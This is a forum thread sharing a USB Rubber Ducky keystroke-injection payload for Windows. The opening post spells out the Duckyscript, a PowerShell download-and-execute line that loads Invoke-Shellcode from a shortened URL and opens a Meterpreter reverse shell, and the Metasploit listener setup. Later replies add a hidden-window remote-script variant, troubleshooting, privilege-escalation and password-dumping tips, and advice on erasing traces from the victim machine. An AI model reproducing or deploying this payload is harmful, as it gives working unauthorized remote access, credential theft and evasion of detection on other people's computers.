[PAYLOAD] The Fastest Meterpreter Shell You'll Ever Get!

[Xcellerator]

Hey guys, I've been playing around with powershell and also been looking into Powersploit (I really suggest you look into powersploit - its got some amazing stuff in it!). Anyway, I came across this: http://www.pentestgeek.com/2013/09/18/invoke-shellcode/, and I thought it would work great as a ducky script!

First, here is the actual Duckyscript code you need to run on the target machine, ONLY AFTER setting up the listener in metasploit below.

DELAY 5000
GUI r
DELAY 500
STRING cmd
ENTER
STRING cd %TEMP%
ENTER
STRING copy con met.cmd
ENTER
STRING start C:/Windows/System32/Ribbons.scr /s
ENTER
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <IP_ADDRESS> -Lport <PORT> -Force"
ENTER
CTRL z
ENTER
DELAY 100
STRING met.cmd && exit
ENTER

Just make sure you remember to change <IP_ADDRESS> to your actual IP Address and <PORT> to the port you want to run the session over.

Now, in a terminal window in a linux distro (make sure you have metasploit installed), make a file with this as it's contents, obviously changing the values in < and > to match your settings:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST <IP_ADDRESS>
set LPORT <PORT>
exploit -j -z

name it whatever you want with a .rc extension.

### MAKE SURE YOU DO THIS BEFORE YOU EXECUTE THE PAYLOAD ON THE MACHINE! IT IS A REVERSE SHELL, NOT A BIND SHELL###

Run this in the terminal:

msfconsole -r ./fileyoujustmade.rc

Let everything start up and ensure there are no errors. (You might get an error with a port already being in use on your machine, or permissions problems if you try and use port 443 on Debian systems without being root).

Now, run the payload from the ducky on the target machine. Once you see the screensaver appear, you're good to remove the Ducky. It may take up to 10 seconds for you to receive your shell as it has to connect out to the internet to load the Invoke-Shellcode plugin and then actually generate and load the meterpreter into memory.

Issues I occured:

I found that my metasploit just sat at "Meterpreter shell 1 opened at....". This could be because it attempts to automatically run the smart_migrate module upon connection. All I did to resolve this was to hit enter to get the msf prompt back, and then connect into the meterpreter session and run smart_migrate automatically.

Smart_migrate can be found at

post/windows/manage/smart_migrate

in the metasploit trunk. Although, be warned - smart_migrate automatically attempts to migrate into explorer.exe which ##DOES NOT## have an administrative privileges. So, you'll have to utilise the post modules to grant yourself admin and eventually even SYSTEM (If you want to dump firefox/chrome/IE passwords, hashes or use mimikatz or WCE to get the wDigest passwords from memory). I'd recommend the bypass_uac or ask modules to grab yourself admin - particularly ask in lower security environments.

For the Forensics Conscious:

If you're concerned about remaining undetected on the machine you've got the shell on, then I recommend the following steps:

1. Delete met.cmd from %TEMP% - You don't want to come back to bite you on the ass once you're done with the machine.

2. Kill the powershell.exe process once you've migrated out of it.

Hope you all enjoy! I know many of you will find good use of this, and as always - use responsibly! ;-P

[TeCHemically]

Very nice! I am having issues though. When the powershell command is entered a ton of red text flies by and the window disappears. No shell results. Sorry I don't have more information. Any help and direction is appreciated!

[hzm74]

I too have the red tekst in the command screen.

Other question: does the attacked computer needs to be logged in as an admin to let this work?

Thnx

[b00stfr3ak]

I have not tried this script but you might need to change your execution policy. I believe by default the execution policy is set to Restricted by default so you can not execute any powershell scripts. You can check this by executing Get-ExecutionPolicy. To get this script to work try to execute Set-ExecutionPolicy Unrestricted or Set-ExecutionPolicy Unrestricted -force but you must be an admin to do this.

[Xcellerator]

Yeah, I'm pretty sure it's an execution policy issue.

Try appending "-ep bypass" just after "powershell". If it works, let me know and I'll update the original post.

[hzm74]

So the target machine needs to be logged in as an admin to let this work?

[b00stfr3ak]

I just tested the powershell command and confirmed it works with out any problems. Can you post the errors you are getting? Admin is not needed, and my execution policy is set to Restricted. I thought it downloaded the script and then you had to run it. Looks like powershell keeps the script in memory and you can call the functions from there pretty sweet.

Edited October 11, 2013 by b00stfr3ak

[Xcellerator]

Oh, good. I'd thought I'd tested it on a machine with Restricted Execution Policy, but I assumed I'd got it wrong from the errors people are getting.

Not to sound silly, but you are changing <IP_ADDRESS> and <PORT> to actual values, aren't you?

[b00stfr3ak]

I'm going to add a version of this to my power-ducky tool kit

powershell -windowstyle hidden "[system.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };IEX (New-Object Net.WebClient).DownloadString('https://172.26.4.38:8080/')"

It will create a https server socket and then the client will grab the powershell script and run it with a hidden window.

[hzm74]

Hello,

These are the "red"-lines i'm getting:

C:\Users\*****>powershell ÏEX (New-Object Net.WebClient).DownloadString('http:/
/bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -
Lhost 192.168.3.109 -Lport 8080 -Force"
The term 'ÏEX' is not recognized as the name of a cmdlet, function, script file
, or operable program. Check the spelling of the name, or if a path was include
d, verify that the path is correct and try again.
At line:1 char:4
+ ÏEX <<<< (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c');
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.1
09 -Lport 8080 -Force
+ CategoryInfo : ObjectNotFound: (ÏEX:String) [], CommandNotFound
Exception
+ FullyQualifiedErrorId : CommandNotFoundException

The term 'Invoke-Shellcode' is not recognized as the name of a cmdlet, function
, script file, or operable program. Check the spelling of the name, or if a pat
h was included, verify that the path is correct and try again.
At line:1 char:89
+ ÏEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invok
e-Shellcode <<<< -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.1
09 -Lport 8080 -Force
+ CategoryInfo : ObjectNotFound: (Invoke-Shellcode:String) [], Co
mmandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException

Thnx !!

I believe it is the following:

'IEX' is changed to 'ÏEX'

This might be a keyboard language problem?

Any help suggestions?

Edited October 12, 2013 by hzm74

[Xcellerator]

Yeah, it looks like a keyboard encoder issue.

It should be "IEX", not ÏEX.

Have you ever has this issue before?

[hzm74]

solved it by adding a space after the ". I have US-international.

But, problem solved.

[hzm74]

I can confirm it works when tested machine is logged in as an admin. Will try now with user account.

[Xcellerator]

As long as powershell is permitted for standard users, it shouldn't be a problem running as non-admin. This is most likely the case for personal machines. However, in a domain environment, you'd be bloody lucky if powershell were available to anyone except local and domain admins, so you're basically out of luck. Unless you have access to a server room for a minute or so.. :-P

[b00stfr3ak]

Created a quick script that will allow you to use any server to host the powershell script and any powershell script to execute on the victims computer. The web server that the script will set up is real basic and you can use http or https. You can also add a real cert if you want, right now it is just a self-sign. I doesn't set anything up for the ducky yet, that will come soon. Working on something else right now that has me a little stuck (transferring 40MB of data using powershell and ssl). But this will be added by this weekend.

https://github.com/b00stfr3ak/fast_meterpreter